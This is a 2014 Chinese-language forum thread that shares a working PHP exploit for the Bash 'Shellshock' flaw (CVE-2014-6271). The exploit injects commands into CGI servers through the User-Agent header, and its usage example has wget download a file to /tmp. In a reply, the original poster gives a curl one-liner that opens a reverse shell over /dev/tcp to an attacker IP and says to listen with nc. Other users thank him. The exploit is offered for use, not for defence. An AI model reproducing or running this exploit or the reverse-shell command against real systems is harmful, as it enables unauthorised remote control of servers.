C4r1st 发表于 2014-9-25 15:20:57

[CVE-2014-6271]Bash远程执行漏洞(附exploit)

本帖最后由 C4r1st 于 2014-9-26 10:55 编辑

http://www.exploit-db.com/exploits/34766/
使用方法:php bash.php -u http://localhost/cgi-bin/hello -c "wget http://xx.xxx -O /tmp/shit"
<?php
/*
Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability
CVE: 2014-6271
Vendor Homepage: http://www.gnu.org/software/bash/
Author: Prakhar Prasad && Subho Halder
Author Homepage: http://prakharprasad.com && http://appknox.com
Date: September 25th 2014
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
       GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
       Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"
Reference: http://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/

Test CGI Code : #!/bin/bash
      echo "Content-type: text/html"
      echo ""
      echo "Bash-is-Vulnerable"

*/
error_reporting(0);
if(!defined('STDIN')) die("Please run it through command-line!\n");
$x= getopt("u:c:");
if(!isset($x['u']) || !isset($x['c']))
{
die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");

}
$url = $x['u'];
$cmd = $x['c'];

    $context = stream_context_create(
      array(
            'http' => array(
                'method'=> 'GET',
                'header'=> 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
            )
      )
    );
   
    if(!file_get_contents($url, false, $context) && strpos($http_response_header,"500") > 0)
    die("Command sent to the server!\n");
    else
    die("Connection Error\n");
?>

相关链接:
http://marc.info/?l=oss-security&m=141157106132018&w=2
http://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
http://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
http://seclists.org/oss-sec/2014/q3/650
http://blog.erratasec.com/2014/09/bash-bug-as-big-as-heartbleed.html#.VCNKRufIZWN
http://pastebin.com/8NRv7s1Z
http://pastebin.com/kQ5ppEZD
http://www.csoonline.com/article/2687265/application-security/remote-exploit-in-bash-cve-2014-6271.html
http://permalink.gmane.org/gmane.comp.security.oss.general/13852?utm_source=twitterfeed&utm_medium=twitter

PS:ModSecurity声称已经针对CVE-2014-6271完善了过滤规则。

终古闲情归落照 发表于 2014-9-25 15:34:20

收下了,谢谢,楼主

岛主黄药师 发表于 2014-9-25 22:28:13

谢谢 收下了:)

ansbase 发表于 2014-9-26 08:17:09

Please Tell Us,How to use it?

C4r1st 发表于 2014-9-26 09:53:55

ansbase 发表于 2014-9-26 08:17
Please Tell Us,How to use it?

curl http://xxx.xxx.xxx.xxx/cgi-bin/vulnerable -A "() { :;}; /bin/sh -i >& /dev/tcp/REVERSE_SHELL_IP/PORT 0>&1"
reverse_shell_ip换成你的外网ip,port端口,nc监听

蓝色_ 发表于 2014-9-26 20:35:32

没人点赞就是你们的不对了

fl0at 发表于 2014-9-26 23:37:28

感谢分享!

葬訫 发表于 2014-9-27 16:18:58

非常好,继续努力

ghostman 发表于 2014-9-29 10:09:38

要把自己的文件丢网上啊、?

heiwu98 发表于 2014-9-30 22:24:36

感谢LZ分享!去学学习习!http://www.freeimagehost.info/files/img/user_uploads/fnzgkitzg6w1965423.gif
页: [1]
查看完整版本: [CVE-2014-6271]Bash远程执行漏洞(附exploit)